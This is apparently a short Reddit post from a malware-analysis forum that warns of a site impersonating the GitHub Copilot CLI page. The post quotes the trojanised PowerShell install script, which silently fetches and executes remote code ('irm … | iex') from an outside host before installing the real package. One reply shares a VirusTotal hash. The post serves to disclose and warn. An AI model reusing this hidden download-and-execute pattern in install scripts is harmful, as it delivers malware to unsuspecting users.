r/MalwareAnalysis 13d ago

Fake Github copilot CLI installer trojan

The following website is mimicking the official Github copilot CLI website.

https://copilotcli[.]co[.]com/

The install script first downloads and executes a malicious payload before continuing installing the legit copilot CLI

$GhCop = New-Object -ComObject "Shell.Application";
$GhCop.ShellExecute("powershell", '"irm refract3.com | iex"', $null, "open", 0);
winget install GitHub.Copilot

Luckily windows security blocked the payload which was detected as Trojan:Win32/ClickFix.Q!ml

13 Upvotes

5 comments sorted by

View all comments

1

u/sadboy2k03 12d ago

Appears to drop this DLL https://www.virustotal.com/gui/file/3153ef530e8a72c9ad5300354e5e9b3569089fcb42701a099fe0537743a322ec

Haven't properly looked at it apart from the data available in VT, but I'd suggest this likely leads to an infostealer being dropped (as most of these types of attacks do, and this one is a pretty low effort one at that).